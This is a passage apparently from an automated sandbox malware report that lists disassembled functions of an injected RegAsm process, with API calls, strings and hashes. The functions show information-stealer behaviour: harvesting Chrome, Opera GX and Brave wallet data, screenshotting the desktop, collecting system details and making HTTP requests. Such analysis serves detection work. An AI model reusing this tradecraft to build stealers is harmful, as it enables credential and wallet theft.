                                                                                                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                          • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                          • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                        • CopyFileA.KERNEL32(?,?,00000001,004373A0,00436802), ref: 0040A613
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                        • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpylstrlen$Find$CopyDeletelstrcat$CloseFirstNextSystemTime
                                                                                                        • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                        • API String ID: 3650549319-1189830961
                                                                                                        • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                        • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                        • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                        • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89
                                                                                                        Function 6C0935A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2225 6c0935a0-6c0935be 2226 6c0938e9-6c0938fb call 6c0cb320 2225->2226 2227 6c0935c4-6c0935ed InitializeCriticalSectionAndSpinCount getenv 2225->2227 2229 6c0938fc-6c09390c strcmp 2227->2229 2230 6c0935f3-6c0935f5 2227->2230 2229->2230 2232 6c093912-6c093922 strcmp 2229->2232 2233 6c0935f8-6c093614 QueryPerformanceFrequency 2230->2233 2234 6c09398a-6c09398c 2232->2234 2235 6c093924-6c093932 2232->2235 2236 6c09361a-6c09361c 2233->2236 2237 6c09374f-6c093756 2233->2237 2234->2233 2240 6c093938 2235->2240 2241 6c093622-6c09364a _strnicmp 2235->2241 2236->2241 2242 6c09393d 2236->2242 2238 6c09375c-6c093768 2237->2238 2239 6c09396e-6c093982 2237->2239 2243 6c09376a-6c0937a1 QueryPerformanceCounter EnterCriticalSection 2238->2243 2239->2234 2240->2237 2244 6c093650-6c09365e 2241->2244 2245 6c093944-6c093957 _strnicmp 2241->2245 2242->2245 2246 6c0937b3-6c0937eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2243->2246 2247 6c0937a3-6c0937b1 2243->2247 2248 6c09395d-6c09395f 2244->2248 2249 6c093664-6c0936a9 GetSystemTimeAdjustment 2244->2249 2245->2244 2245->2248 2250 6c0937ed-6c0937fa 2246->2250 2251 6c0937fc-6c093839 LeaveCriticalSection 2246->2251 2247->2246 2252 6c0936af-6c093749 call 6c0cc110 2249->2252 2253 6c093964 2249->2253 2250->2251 2255 6c09383b-6c093840 2251->2255 2256 6c093846-6c0938ac call 6c0cc110 2251->2256 2252->2237 2253->2239 2255->2243 2255->2256 2260 6c0938b2-6c0938ca 2256->2260 2261 6c0938dd-6c0938e3 2260->2261 2262 6c0938cc-6c0938db 2260->2262 2261->2226 2262->2260 2262->2261
                                                                                                        APIs
                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(6C11F688,00001000), ref: 6C0935D5
                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0935E0
                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 6C0935FD
                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C09363F
                                                                                                        • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C09369F
                                                                                                        • __aulldiv.LIBCMT ref: 6C0936E4
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C093773
                                                                                                        • EnterCriticalSection.KERNEL32(6C11F688), ref: 6C09377E
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11F688), ref: 6C0937BD
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6C0937C4
                                                                                                        • EnterCriticalSection.KERNEL32(6C11F688), ref: 6C0937CB
                                                                                                        • LeaveCriticalSection.KERNEL32(6C11F688), ref: 6C093801
                                                                                                        • __aulldiv.LIBCMT ref: 6C093883
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C093902
                                                                                                        • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C093918
                                                                                                        • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C09394C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                        • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                        • API String ID: 301339242-3790311718
                                                                                                        • Opcode ID: ec5c4b279e44b9dcab99af01cdb30f51e538882f6dd75f192c997f30e271cd18
                                                                                                        • Instruction ID: 6bdb04a9e3d9b1d2f64cdd1e750fa07aae122885e89c58673e1084281f816d3a
                                                                                                        • Opcode Fuzzy Hash: ec5c4b279e44b9dcab99af01cdb30f51e538882f6dd75f192c997f30e271cd18
                                                                                                        • Instruction Fuzzy Hash: 7CB1A5B1B093109FDB08DF28C65671ABBF5AB8E704F04892DE499D3B90D7789901EF91
                                                                                                        Function 00415FD1 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$wsprintf$Find$File$CloseFirstMatchNextPathSpec
                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                        • API String ID: 3541214880-445461498
                                                                                                        • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                        • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                        • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                        • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                        Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                        • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                        • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                          • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                          • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                          • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                          • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                          • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                        • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                        • wsprintfA.USER32 ref: 00411949
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                        • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                        • API String ID: 2280294774-461178377
                                                                                                        • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                        • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                        • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                        • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                        Function 00406963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                          • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                          • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                          • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                        • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                        • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                        • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                        • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                        • String ID: ERROR$ERROR$GET
                                                                                                        • API String ID: 3863758870-2509457195
                                                                                                        • Opcode ID: f8bbef71df04f966e5d320ec9155bdde9ed9db18ec7c49dd597abc49b73d9854
                                                                                                        • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                        • Opcode Fuzzy Hash: f8bbef71df04f966e5d320ec9155bdde9ed9db18ec7c49dd597abc49b73d9854
                                                                                                        • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                        Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                        • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                        • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                        • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                        • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                        • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                          • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                          • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                        • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                        • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                        • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                        • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2610876673-0
                                                                                                        • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                        • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                        • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                        • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                        Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • wsprintfA.USER32 ref: 0041546A
                                                                                                        • FindFirstFileA.KERNEL32(?,?), ref: 00415481
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
                                                                                                        • StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
                                                                                                        • lstrcatA.KERNEL32(?), ref: 0041550D
                                                                                                        • lstrcatA.KERNEL32(?), ref: 00415520
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415534
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00415547
                                                                                                        • lstrcatA.KERNEL32(?,00436A88), ref: 00415559
                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041556D
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00415623
                                                                                                        • FindClose.KERNEL32(?), ref: 00415637
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                        • String ID: %s\%s
                                                                                                        • API String ID: 1150833511-4073750446
                                                                                                        • Opcode ID: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                        • Instruction ID: 7b4a02d1ce16c29d0e311cc455c9dd4e2592c9f450b56a316f79c40a9e4a8b0e
                                                                                                        • Opcode Fuzzy Hash: 2e0bb3d38ea62b5c105b61d514d6becb3cb91e1da354d02d3ddcedb69e666a60
                                                                                                        • Instruction Fuzzy Hash: 71515FB190021D9BCF64DF60CC89AC9B7BDAB48305F1045E6E609E3250EB369B89CF65
                                                                                                        Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
